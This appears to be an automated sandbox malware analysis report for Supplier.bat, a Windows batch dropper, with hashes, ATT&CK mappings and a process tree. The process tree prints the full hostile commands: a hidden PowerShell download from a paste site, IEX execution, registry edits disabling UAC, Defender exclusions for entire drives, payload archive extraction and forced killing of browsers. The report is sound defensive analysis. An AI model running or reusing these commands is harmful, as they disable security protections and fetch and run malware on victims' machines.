b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d

Analysis

max time kernel
118s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
30-12-2024 10:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Supplier.bat
Size

41KB
MD5

b84568e632497dd5dc2f4ac9f08b783c
SHA1

a0a8e9493a356a2c495130da52c5b49c3d82685a
SHA256

b581b7dc5964af28d29760b27b1af0f47a13e2ca9bf61adf1558ae33b5c3881d
SHA512

e8dfb9a8ee9ffdcad0899e2c07d56883bb25d160cf3c84fff1dec079b5cd4a02e00b380c557df5b835b72336b81ac31118eac19f8e5be3f52e402d48f6038ca3
SSDEEP

96:T/63GJPQPb8TddwNuwfENeToq+u8+lddLdpCd9dTddxNEbb8mJPQP8u8+vdpCd9G:rwxGqFdMndL3fvPAFrBhwHON0

Score

10^/10

defense_evasion discovery evasion execution persistence privilege_escalation trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://paste.fo/raw/cdfd23f3b9ad

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2764	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2924	powershell.exe
332	powershell.exe
3028	powershell.exe
2100	powershell.exe
868	powershell.exe
1360	powershell.exe
2764	powershell.exe
2596	powershell.exe

Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs

Possible Turn off User Account Control's privilege elevation for standard users.

defense_evasion persistence privilege_escalation

Executable Installer File Permissions Weakness

T1574.005

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
10	raw.githubusercontent.com
13	raw.githubusercontent.com
7	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
2628	timeout.exe
2916	timeout.exe

Kills process with taskkill 12 IoCs

evasion

pid	Process
1620	taskkill.exe
884	taskkill.exe
1524	taskkill.exe
1676	taskkill.exe
1324	taskkill.exe
2024	taskkill.exe
2320	taskkill.exe
1532	taskkill.exe
2516	taskkill.exe
1368	taskkill.exe
816	taskkill.exe
1512	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 26 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{26C64271-C699-11EF-9D09-F245C6AC432F} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe

Modifies registry key 1 TTPs 12 IoCs

Modify Registry

T1112

pid	Process
2536	reg.exe
2484	reg.exe
644	reg.exe
1928	reg.exe
2896	reg.exe
2860	reg.exe
2892	reg.exe
1456	reg.exe
1736	reg.exe
2216	reg.exe
2640	reg.exe
2884	reg.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2764	powershell.exe
2596	powershell.exe
2596	powershell.exe
2596	powershell.exe
2924	powershell.exe
332	powershell.exe
3028	powershell.exe
2100	powershell.exe
868	powershell.exe
1360	powershell.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	2764	powershell.exe
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	332	powershell.exe
Token: SeDebugPrivilege	3028	powershell.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	1360	powershell.exe
Token: SeRestorePrivilege	1056	7z.exe
Token: 35	1056	7z.exe
Token: SeSecurityPrivilege	1056	7z.exe
Token: SeDebugPrivilege	2516	taskkill.exe
Token: SeDebugPrivilege	1368	taskkill.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	884	taskkill.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	1676	taskkill.exe
Token: SeDebugPrivilege	1324	taskkill.exe
Token: SeDebugPrivilege	2024	taskkill.exe
Token: SeDebugPrivilege	816	taskkill.exe
Token: SeDebugPrivilege	2320	taskkill.exe
Token: SeDebugPrivilege	1512	taskkill.exe
Token: SeDebugPrivilege	1532	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1840	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1840	iexplore.exe
1840	iexplore.exe
2920	IEXPLORE.EXE
2920	IEXPLORE.EXE
2920	IEXPLORE.EXE
2920	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2748 wrote to memory of 2828	2748	cmd.exe	31
PID 2748 wrote to memory of 2828	2748	cmd.exe	31
PID 2748 wrote to memory of 2828	2748	cmd.exe	31
PID 2828 wrote to memory of 2764	2828	cmd.exe	33
PID 2828 wrote to memory of 2764	2828	cmd.exe	33
PID 2828 wrote to memory of 2764	2828	cmd.exe	33
PID 2828 wrote to memory of 2596	2828	cmd.exe	34
PID 2828 wrote to memory of 2596	2828	cmd.exe	34
PID 2828 wrote to memory of 2596	2828	cmd.exe	34
PID 2596 wrote to memory of 2672	2596	powershell.exe	35
PID 2596 wrote to memory of 2672	2596	powershell.exe	35
PID 2596 wrote to memory of 2672	2596	powershell.exe	35
PID 2672 wrote to memory of 1456	2672	cmd.exe	37
PID 2672 wrote to memory of 1456	2672	cmd.exe	37
PID 2672 wrote to memory of 1456	2672	cmd.exe	37
PID 2672 wrote to memory of 2216	2672	cmd.exe	38
PID 2672 wrote to memory of 2216	2672	cmd.exe	38
PID 2672 wrote to memory of 2216	2672	cmd.exe	38
PID 2672 wrote to memory of 644	2672	cmd.exe	39
PID 2672 wrote to memory of 644	2672	cmd.exe	39
PID 2672 wrote to memory of 644	2672	cmd.exe	39
PID 2828 wrote to memory of 1840	2828	cmd.exe	40
PID 2828 wrote to memory of 1840	2828	cmd.exe	40
PID 2828 wrote to memory of 1840	2828	cmd.exe	40
PID 2672 wrote to memory of 1736	2672	cmd.exe	41
PID 2672 wrote to memory of 1736	2672	cmd.exe	41
PID 2672 wrote to memory of 1736	2672	cmd.exe	41
PID 2828 wrote to memory of 2916	2828	cmd.exe	42
PID 2828 wrote to memory of 2916	2828	cmd.exe	42
PID 2828 wrote to memory of 2916	2828	cmd.exe	42
PID 2672 wrote to memory of 2484	2672	cmd.exe	43
PID 2672 wrote to memory of 2484	2672	cmd.exe	43
PID 2672 wrote to memory of 2484	2672	cmd.exe	43
PID 2672 wrote to memory of 1928	2672	cmd.exe	44
PID 2672 wrote to memory of 1928	2672	cmd.exe	44
PID 2672 wrote to memory of 1928	2672	cmd.exe	44
PID 2672 wrote to memory of 2640	2672	cmd.exe	45
PID 2672 wrote to memory of 2640	2672	cmd.exe	45
PID 2672 wrote to memory of 2640	2672	cmd.exe	45
PID 2672 wrote to memory of 2896	2672	cmd.exe	46
PID 2672 wrote to memory of 2896	2672	cmd.exe	46
PID 2672 wrote to memory of 2896	2672	cmd.exe	46
PID 2672 wrote to memory of 2860	2672	cmd.exe	47
PID 2672 wrote to memory of 2860	2672	cmd.exe	47
PID 2672 wrote to memory of 2860	2672	cmd.exe	47
PID 2672 wrote to memory of 2884	2672	cmd.exe	48
PID 2672 wrote to memory of 2884	2672	cmd.exe	48
PID 2672 wrote to memory of 2884	2672	cmd.exe	48
PID 1840 wrote to memory of 2920	1840	iexplore.exe	49
PID 1840 wrote to memory of 2920	1840	iexplore.exe	49
PID 1840 wrote to memory of 2920	1840	iexplore.exe	49
PID 1840 wrote to memory of 2920	1840	iexplore.exe	49
PID 2672 wrote to memory of 2892	2672	cmd.exe	50
PID 2672 wrote to memory of 2892	2672	cmd.exe	50
PID 2672 wrote to memory of 2892	2672	cmd.exe	50
PID 2672 wrote to memory of 2536	2672	cmd.exe	51
PID 2672 wrote to memory of 2536	2672	cmd.exe	51
PID 2672 wrote to memory of 2536	2672	cmd.exe	51
PID 2672 wrote to memory of 2924	2672	cmd.exe	52
PID 2672 wrote to memory of 2924	2672	cmd.exe	52
PID 2672 wrote to memory of 2924	2672	cmd.exe	52
PID 2672 wrote to memory of 332	2672	cmd.exe	53
PID 2672 wrote to memory of 332	2672	cmd.exe	53
PID 2672 wrote to memory of 332	2672	cmd.exe	53

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Supplier.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Supplier.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\Supplier.bat'))"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2596
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2672
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:1456
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
        5⤵
        Hijack Execution Flow: Executable Installer File Permissions Weakness
        Modifies registry key
        
        PID:2216
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:644
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:1736
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2484
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:1928
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2640
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2896
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2860
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2884
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:2892
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:2536
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2924
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:332
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3028
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2100
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:868
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1360
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOCX.zip
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1840
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1840 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2920
- - C:\Windows\system32\timeout.exe
    timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:2916
- - C:\Program Files\7-Zip\7z.exe
    "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\DOCX.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1056
- - C:\Windows\system32\timeout.exe
    timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:2628
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM chrome.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2516
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM firefox.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1368
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM msedge.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1620
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM iexplore.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:884
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM opera.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1524
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM safari.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1676
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM brave.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1324
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM vivaldi.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2024
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM epic.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:816
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM yandex.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2320
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM tor.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1512
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM CMD.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9431a139bb37e290f021feaf65c2091e

SHA1
84ce61ea560790d9f7fa2d893fe877b13be602df

SHA256
beca4dd528e0a3fb32aeca6e45d263b307bd26c0d0b52db9f34a6712ffc767a6

SHA512
b2b94852d568a14639c00301b664545e0d33f9291eb10c8720b7cf1d21ccd513c9bf75b10d90659a2d857f6bbe29957dd8cb7129d9f76e8cd9f5738948dc2439

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a5f9cee5aac18480d7ab8a9452fc4d40

SHA1
58707ca466de32fd8c32942b7128efa18a591f33

SHA256
1fa05e0efb9ca5ccea4277e1c711ee768e8840d964d23df2e3140c4155cbfb1b

SHA512
e1c28cca428200a97f942d89bcefe52172badc92cdfb7df3964174cfc74f43bcc0efcd71337a63ba2b9584be723b395ebb93f795ba04d298ae63c6ebcb761b4b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b86028dcfbc8b37a207c9fb120824b1f

SHA1
feb0569dd55c8d752fb79af7a34e1792a117e0a9

SHA256
bc9365ee4eeccf57d809b95b42eab0499d9180693f0e73910b0543b4da75f55c

SHA512
8b5b5e55393d5f5661127c3885119c1f55bee062af9238a813effa15ae8e405a3335f12abf535b934ae57b4b1d17122902e279d0ccb659ddbc523c2e9348979b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4494d7ea54b1d9b3c533024f75899cf0

SHA1
641c86c769a27ff9120ba7835ca0b562e57d3369

SHA256
30571bf814b1e8f16cd2c3872361854d83db3ee6b4f3f756f9d541ae9eb9422f

SHA512
229c582117697cc7c83f3df1d29e889ddf5890fb9e250fc2e814f4518d7f5809dd0aa0f7a664de04e3a30ebff25f0d4afa3a7d5dd5e5acc03032c6820164bb9a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b54d6f1b3f470e7c0f0477b5bebc8673

SHA1
6313a7e540630cf0c430d31cac64a0785ae9698f

SHA256
3bdef03e2b3be2d00635d452bec9d0971a4622daadc6e6f6c6f4abf9451f45f8

SHA512
2058439c9364f14a2edee43b8574f2ce35dd7f6668e0339f55b4bce09342f6c43c45cdaf58bfceb48ecec882b3348c07fb7107596a77c2a19df2a1455dad87a2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d3adc9da1b224296c4c57c5a8da979d3

SHA1
4ad718b87657ecfa10ee24498488db3311c7b66d

SHA256
3cd2907bd223d834121b9c2627254a6334f8851e43bd5005e33a842a6988ad5b

SHA512
626a61dda3b650ed0fddf54bba7327d185c2077e99a788f68a1a32bd97e35a0854b409bd91fb7f766d78119d1d131abd100b94662ff159b3b3c654102bad8910

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e968634d909e90b9cbc88936b4946f56

SHA1
1e2a887f4108aa1794df3b2d6976948e7ae3ca6f

SHA256
d8ef330b93d5483519cb05f1de8769c8991e23fd4d33735450e60eee8695ee7e

SHA512
c2ab97e376f5067052d558275b3a7f688e6ab888766ac0f1c3ba3c958b63e18f95e75a52d0b6192219c105bbbdecae1726889a901bd337dad83ec3f2123be52d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
29d490adc137320719ce4bc09e61c7df

SHA1
f47a9b03fb1e1091a9ef437ecf501eb64b07ea17

SHA256
3cc91b86ce2bd5d3fe100082099ee205161056dcc08edc7ea3e47c84caa76afa

SHA512
48305ed7862d10aa3600b38e7e6b401d06d9eca15470110728891e360b53d0711ac258c2be117b9e7a90cc10f23c6dff4dd18337cd231cb30d7af39ef04ed76f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0c089d8b6acf114e60d79b35eb92f0be

SHA1
f0ed04a8f856757f79f49527887cf7f2101ac212

SHA256
0d7d9238d6ab04f1c858e3097f3710cf5ec7daf4fa11be2f5bcb594f1a9cc5f8

SHA512
52b05d41d38ac0e4289c798fdc4ca129fc7e50689b0b3ace300e4d84898272e374c65c5fb27a378565b021f096c8206c2d5224946c6a6d46cfed915820e1fd30

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
efe7b7cccf1a032c8d386f7e41560de9

SHA1
46db2005837f8101c13fa0c27b987f33445fbdff

SHA256
5ec3da7aacd43d6b9aed39741c46e1f557ef83834d6d35de8c0ac9968a9fc70a

SHA512
f90d8b8a5f73c2f7dca1a6391b64f36bd20ab4698c45bb1bb543e232835653c122b24ae305535065bf4e4d1761d465d5f4f05c3f1367bc5c7b09274bb01c1b9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\BatchByloadStartHid.bat

Filesize
1KB

MD5
45a66afa3b07b3143f0d0c3515898bae

SHA1
cc5baf0c4d2fc0b034974786f20087e058915693

SHA256
8a8c558b5cb169e5d2967dc3e69cb26174bdd8d457903f074477ef1c555b4fb6

SHA512
04aee35c068225ec8982fc273fd4e4e172cf336b26561d5b8c7ccf3fe972c485b962d01bdcfab2a27fe456364114417dc3c44852d8431def9a04812e8008106f

